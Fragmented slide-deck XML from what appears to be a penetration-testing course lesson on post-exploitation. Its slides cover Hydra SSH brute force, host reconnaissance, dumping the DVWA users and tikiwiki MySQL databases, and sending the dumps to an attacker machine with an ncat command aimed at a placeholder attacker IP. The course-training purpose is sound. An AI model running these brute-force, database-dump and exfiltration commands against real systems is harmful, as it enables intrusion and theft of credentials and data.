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 Medium" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId49"/>
      <p:bold r:id="rId50"/>
      <p:italic r:id="rId51"/>
      <p:boldItalic r:id="rId52"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId53"/>
      <p:bold r:id="rId54"/>
      <p:italic r:id="rId55"/>
      <p:boldItalic r:id="rId56"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin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43" d="100"/>
          <a:sy n="143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0d0f2400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0d0f2400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d8ff5b3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d8ff5b3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d8ff5b31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d8ff5b31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8ff5b31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8ff5b31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d8ff5b3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d8ff5b3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451a80101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451a80101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6451a8010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6451a8010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0d0f2400b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50d0f2400b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50d0f2400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50d0f2400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d8ff5b31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d8ff5b31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d8ff5b31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d8ff5b31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d8ff5b31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d8ff5b31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d8ff5b31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d8ff5b31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d8ff5b31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d8ff5b31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0d0f2400b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0d0f2400b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d8ff5b31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d8ff5b31e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d8ff5b31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5d8ff5b31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0d0f2400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0d0f2400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0d0f2400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0d0f2400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0d0f2400b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0d0f2400b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0d0f240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0d0f240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0d0f2400b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0d0f2400b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0d0f2400b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0d0f2400b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0d835265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0d835265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d8ff5b31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d8ff5b31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0d0f2400b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0d0f2400b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0d0f2400b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50d0f2400b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0d0f2400b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0d0f2400b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d8ff5b31e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d8ff5b31e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d189b684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4d189b684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0d0f240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0d0f240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d0ec0dd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d0ec0dd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0d0f2400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0d0f2400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d8ff5b31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d8ff5b31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4973c528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4973c528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0d0f2400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0d0f2400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2 Day 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1020" name="Google Shape;1020;p52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271800" y="1732400"/>
            <a:ext cx="8600400" cy="7572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Targets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1021" name="Google Shape;1021;p5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101" name="Google Shape;110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2197550" y="3441050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Review Scanning with Metasploit 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(Solution File can be sent out for later reference)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08" name="Google Shape;1108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09" name="Google Shape;1109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body" idx="3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19" name="Google Shape;111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20" name="Google Shape;1120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22" name="Google Shape;1122;p63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3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Ncat Victim IP Address&gt; 22 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>and wait for the banner.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23" name="Google Shape;1123;p63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3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29" name="Google Shape;1129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30" name="Google Shape;1130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31" name="Google Shape;1131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33" name="Google Shape;1133;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3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Ncat Victim IP Address&gt; 22 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>and wait for the banner.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34" name="Google Shape;1134;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3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lang="en" i="1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35" name="Google Shape;1135;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="268095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Hydra -L /usr/share/ncrack/short.usr -P /usr/share/ncrack/short.pwd ssh:&lt;Victim IP Address&gt;. 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41" name="Google Shape;114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42" name="Google Shape;1142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43" name="Google Shape;1143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6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45" name="Google Shape;1145;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3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51" name="Google Shape;1151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52" name="Google Shape;115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53" name="Google Shape;1153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6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55" name="Google Shape;1155;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3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Metasploit’s scanning modules can be used for precise version scans within Metasploit. Nmap can do this via Nmap Scripts, but you would have to download those. Metasploit’s scanner modules come pre-packaged and includes a description of each module.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="1D1C1D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1156" name="Google Shape;1156;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3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62" name="Google Shape;1162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63" name="Google Shape;1163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64" name="Google Shape;116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66" name="Google Shape;1166;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3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Metasploit’s scanning modules can be used for precise version scans within Metasploit. Nmap can do this via Nmap Scripts, but you would have to download those. Metasploit’s scanner modules come pre-packaged and includes a description of each module.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="1D1C1D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1167" name="Google Shape;1167;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1168" name="Google Shape;1168;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="3077600"/>
            <a:ext cx="9144000" cy="226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</a:rPr>
              <a:t>Metasploit’s scanning modules are not as flexible as Nmap’s. Nmap is a better tool for port scanning. Metasploit can be useful for specific version scans.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 and Transfering Files with Ncat </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174" name="Google Shape;1174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75" name="Google Shape;1175;p6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76" name="Google Shape;1176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182" name="Google Shape;1182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183" name="Google Shape;1183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184" name="Google Shape;1184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186" name="Google Shape;1186;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="1607975"/>
            <a:ext cx="8146800" cy="439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System Information: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OS Version and architecture, Kernel Version.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69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="2167725"/>
            <a:ext cx="8146800" cy="439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List all the interfaces the victim is connected to.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69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="2727475"/>
            <a:ext cx="8146800" cy="439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User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Find all users on the system.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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="3287225"/>
            <a:ext cx="8146800" cy="439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Running Services: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running services reveals additional services to exploit.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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="3846975"/>
            <a:ext cx="8146800" cy="439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Installed Applications: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installed software is helpful for vulnerability analysis.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69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="4406725"/>
            <a:ext cx="8146800" cy="439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Stored Credentials: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Any hashes passwords or credentials hidden in configuration files.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197" name="Google Shape;1197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198" name="Google Shape;1198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199" name="Google Shape;1199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7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01" name="Google Shape;1201;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="1607975"/>
            <a:ext cx="8146800" cy="4395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System Information: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OS Version and architecture, Kernel Version.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70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="2202100"/>
            <a:ext cx="8146800" cy="22053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Need when creating backdoors and other malware.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On Unix, run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uname -a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On Windows, use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systeminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in the CMD prompt.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you will be able to:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="Google Shape;1028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29" name="Google Shape;1029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3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 reconnaissance on compromised hosts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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="2239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Transfer between machines using Ncat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3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Manually dump information from a MySQL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08" name="Google Shape;1208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209" name="Google Shape;120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210" name="Google Shape;1210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7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66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12" name="Google Shape;1212;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="1664375"/>
            <a:ext cx="8146800" cy="439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List all the interfaces the victim is connected to.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71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="2352000"/>
            <a:ext cx="8146800" cy="19671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reveals additional subnets you might be able to pivot to.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run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run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ipconfig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19" name="Google Shape;121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220" name="Google Shape;1220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221" name="Google Shape;1221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7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23" name="Google Shape;1223;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498600" y="1667375"/>
            <a:ext cx="8146800" cy="439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User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Find all users on the system.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72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460975" y="2251675"/>
            <a:ext cx="8146800" cy="2185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Provides a list of accounts to attempt to exploit and escalate privileges from.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look in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r>
              <a:rPr lang="en" sz="1800" b="1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1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use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net user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the CMD prompt.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30" name="Google Shape;1230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34" name="Google Shape;1234;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="1765775"/>
            <a:ext cx="8146800" cy="439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Running Services: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running services reveals additional services to exploit.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73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="2316800"/>
            <a:ext cx="8146800" cy="1886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run: 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service --status-all or systemctl | grep running</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1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use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tasklist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the CMD prompt, or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get-process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PowerShell.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Now we’re in the Post-Exploitation phase. Time to exfiltrate some data!</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1242" name="Google Shape;12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243" name="Google Shape;1243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45" name="Google Shape;1245;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="1667850"/>
            <a:ext cx="8146800" cy="439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Installed Applications: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installed software is helpful for vulnerability analysis.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74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="2250522"/>
            <a:ext cx="8146800" cy="1293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This is a bit more involved than the other tasks, particularly on Windows. Metasploit has modules for listing software. However, on Ubuntu and Kali, you can run: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800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apt list --installed.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"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7" name="Google Shape;1247;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="3686700"/>
            <a:ext cx="8146800" cy="439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Stored Credentials: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Any hashes passwords or credentials hidden in configuration files.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74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460950" y="4227800"/>
            <a:ext cx="8146800" cy="439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Also more complicated… We’ll cover it later.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254" name="Google Shape;1254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Collecting Information, Running Services, and Transfering Files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Information Demo</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1261" name="Google Shape;126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Post-Demo Takeaways: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1262" name="Google Shape;1262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263" name="Google Shape;1263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uname -a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: get OS and kernel version information. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1265" name="Google Shape;1265;p7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/>
              <a:t>: get network interfaces and IP addresses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1266" name="Google Shape;1266;p7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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: get a list of all users </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1267" name="Google Shape;1267;p7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apt list --installed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: list installed software</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1268" name="Google Shape;1268;p7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service --status-all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: list running services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Ncat can be used to transfer the file back to the attacking machine. This requires running Ncat on two machines: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276" name="Google Shape;127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listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, which will be receiving the file. This is the attacking machine. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1278" name="Google Shape;1278;p7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server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, which will be sending the file. This will be be the target machine. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1279" name="Google Shape;1279;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422075" y="2367475"/>
            <a:ext cx="8510400" cy="24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ncat -lvp 2222 &gt; /tmp/metainfo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Sends any data transferred to Ncat to a file, instradf of to on the screen.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-lvp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indicated “listen”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means “verbose”. Ncat prints more information about the connection.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means “port”. Specifying to listen to port 2222.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Ncat is the only an option when you have the shell but no SHH access.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285" name="Google Shape;128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86" name="Google Shape;1286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/>
              <a:t>Complete the instructions from Slack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> proceeding to the Part 14 instructions, steps 19-25</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1287" name="Google Shape;1287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Information Gathering and Ncat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students will perform information gathering on a compromised host, and then transfer the meta-information back to their attack box.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79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2197550" y="3441050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Information Gathering and Ncat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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2553025" y="14195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After gaining access to an SSH server via brute force, the attacker can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>pillage the compromised host. </a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1044" name="Google Shape;1044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45" name="Google Shape;1045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Databases</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305" name="Google Shape;1305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06" name="Google Shape;1306;p8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307" name="Google Shape;1307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Databases</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1313" name="Google Shape;1313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are the ultimate sources of information in a penetration test. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1314" name="Google Shape;1314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315" name="Google Shape;131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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442500" y="1417775"/>
            <a:ext cx="8165400" cy="266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1711175"/>
            <a:ext cx="2099131" cy="2028000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="57150" dist="47625" dir="960000" algn="bl" rotWithShape="0">
              <a:srgbClr val="1155CC">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1318" name="Google Shape;1318;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2626800" y="1711175"/>
            <a:ext cx="6149700" cy="2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MySQL is running on the target.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Along with Metasploit and sqlmap, pentesters can exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="18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database administrator command-line tools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for pillage purposes.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When pillaging databases, search for credentials, sensitive data , and system information.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9" name="Google Shape;13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1711175"/>
            <a:ext cx="2099131" cy="2028000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="57150" dist="9525" dir="960001" algn="bl" rotWithShape="0">
              <a:srgbClr val="FF0000">
                <a:alpha val="31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Commands</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1325" name="Google Shape;132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Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: every MySQL command ends with a  semicolon ; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1326" name="Google Shape;1326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327" name="Google Shape;1327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83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="14087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show databases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24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Display all installed databases</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="D73A49"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1329" name="Google Shape;132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 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db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r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="D73A49"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connect to a specific database</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="D73A49"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1330" name="Google Shape;1330;p83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="2890588"/>
            <a:ext cx="9168600" cy="3648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show tables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24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Display all tables in a database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331" name="Google Shape;1331;p83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="3602125"/>
            <a:ext cx="9168600" cy="3648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describe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="D73A49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="D73A49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;;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Display column names for a given table.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332" name="Google Shape;1332;p83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="4233288"/>
            <a:ext cx="9168600" cy="4170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15240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* from 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&gt;; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Select all records from a table.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="D73A49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F8FA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Databases</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1338" name="Google Shape;1338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mysqldump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> utility allows you to dump a database to a text file. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1339" name="Google Shape;1339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1340" name="Google Shape;1340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8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sudo mysqldump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tikiwiki &gt; /tmp/tikiwiki.sql.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="180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Saves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tikiwiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> database to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tmp/tikiwiki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file can then be transferred back to the attack machine with Ncat.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Being able to dump and pillage an entire database is a critical vulnerability and a “holy grail” for attackers and pentesters. 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347" name="Google Shape;1347;p8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8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Interacting with MySQL and Dumping Databases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354" name="Google Shape;1354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355" name="Google Shape;1355;p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/>
              <a:t>Continue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Part 14 — SSH Exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, this time completing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Steps 26 — View SQL Database Information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Step 35: Continue to Gain Victim Information</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1356" name="Google Shape;1356;p8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Pillaging SQL Database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exercise, you will use mysql and mysqldump to pillage SQL databases on the compromised host.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362" name="Google Shape;1362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87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2179325" y="3483075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Pillaging SQL Databases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 Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1369" name="Google Shape;1369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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1370" name="Google Shape;1370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371" name="Google Shape;1371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8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Find user information in the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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> database by using the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describe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> keyword to list tables.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Select the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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> database with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Use select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rgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from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>
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to dump user, password information.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Use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mysqldump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to save the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dvwa.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> table to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/tmp/dvwa.users.sql: sudo mysqldump dvwa users &gt; /tmp/dvwa.users.sql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</a:rPr>
              <a:t>Use Ncat to transfer the database to the attacking machine.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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</a:rPr>
              <a:t>On Attacker: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ncat -lvp 2222 &gt; dvwa.users.sql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1750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</a:rPr>
              <a:t>On Victim: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1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ncat &lt;Attacking Machine IP Address&gt; 2222 &lt; /tmp/dvwa/users.sql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378" name="Google Shape;137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379" name="Google Shape;137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380" name="Google Shape;138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8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Perform reconnaissance on compromised hosts.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Transfer files between machines using Ncat.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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manually dump information from a MySQL database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382" name="Google Shape;1382;p89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407125" y="1284250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89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407125" y="1805163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89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407125" y="2326100"/>
            <a:ext cx="355500" cy="3555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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
